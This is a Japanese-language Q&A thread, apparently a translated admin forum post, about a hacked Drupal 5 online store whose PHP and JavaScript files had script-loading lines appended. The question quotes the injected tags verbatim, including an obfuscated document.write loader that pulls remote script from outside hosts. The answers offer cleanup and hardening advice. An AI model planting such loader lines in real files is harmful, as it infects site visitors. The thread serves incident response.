これは Drupal 5 をベースにしたオンライン ストアに関するものです。
突然、機能しなくなりました。サイトにアクセスすると、次のエラーが発生しました。
解析エラー: 構文エラー、/home/public_html/index.php の 38 行目に予期しない '<' があります
さらに調べてみると、index.php の末尾に次の 2 行が見つかりました。
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
これらの 2 行を手動で削除すると、サイトは再び正常に動作するようになります。
しかし、さらに多くの問題 (ページの編集に関する問題) が報告された後、実際にはすべての *.js ファイルが「感染」していることがわかりました。すべてのファイルの末尾に余分な行が含まれています。
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
このサイトはハッキングされたのでしょうか? 「blog.nodisposable.com」を Google で検索しても、面白いものは何も出てきません。そのサイト自体は正当なもののようです。おそらくハッキングされたのでしょうか?
なぜこのようなことが起きたのか説明できる人はいますか? これを元に戻すにはどうしたらいいでしょうか? また、今後これを回避するにはどうしたらいいでしょうか?
アップデート
ウェブサイトのバックアップ(データベースではない)を復元した後、同じことが再び発生しましたが、今度はスクリプト タグが を指していましたdolfy.sedonahyperbarics.com:8080/XHTML.js。
どうやら、無作為の Drupal ユーザー アカウントも多数作成されていたようです。これは、実際には Drupal の脆弱性であったことの兆候かもしれません。
私たちはそれらを削除し、ユーザー アカウントの作成を管理者のみに制限しました (最初からそうすべきだったのはわかっています :-s)。また、管理者ユーザーのパスワードを変更しました。より安全
今は再発しないことを祈ります。
答え1
ハッキングされた場合、バックドアがインストールされているかどうかはわかりません。
再フォーマット後、正常なバックアップから再インストールする必要がある場合があります。
システムに侵入者がいたシステムを決して信頼しないでください。
将来的にこれを防ぐには、アップデートに遅れずについていき、実行しているソフトウェアの脆弱性とベストプラクティスを常に最新の状態に保っているリスト (Drupal リスト、プラットフォームのセキュリティ リストなど) を購読し、システムを使用するために必要なユーザーのみにサービスをロックダウンし、安全なパスワードを使用し、平文で何も行わず、その他すべてはここでの回答の文脈をはるかに超えるセキュリティのベストプラクティスに従ってください。また、適切なバックアップを保持し、侵入者の活動をチェックするための侵入検知システム (Tripwire のようなシステムなど) を導入してください。
答え2
はい、残念ながら感染しています。残念ながら、その「方法」は、さらに多くの時間と労力を費やさなければ明らかにできません。Drupal インストール (またはそのモジュールの 1 つ) の脆弱性、同じサーバー上の別のアプリケーションの脆弱性、弱い (または盗まれた) FTP パスワードなどが考えられます。侵入の可能性のあるポイントは数多くあります。
答え3
非常によく似た(ほぼ同一)ものを見たことがありますが、Drupal とは関係なく、間違いなくハックでした。
他の方もおっしゃっているように、環境に関する詳細情報がなければ、知ることは困難です。提供されないようにブロックするために簡単にできることは、.js ファイルへのリクエストを拒否またはリダイレクトするディレクティブを .htaccess ファイルに入れることです。
答え4
これは完全に私の経験に基づくものですが、このようなハッキング、特に再感染は、サーバーに FTP アクセスできる誰かがローカル マシンを感染させ、資格情報を盗んだことが原因です。FTP ログをチェックして、すべての IP アドレスと更新が有効であることを確認してください。再感染している場合は、そこに簡単に表示されるはずです。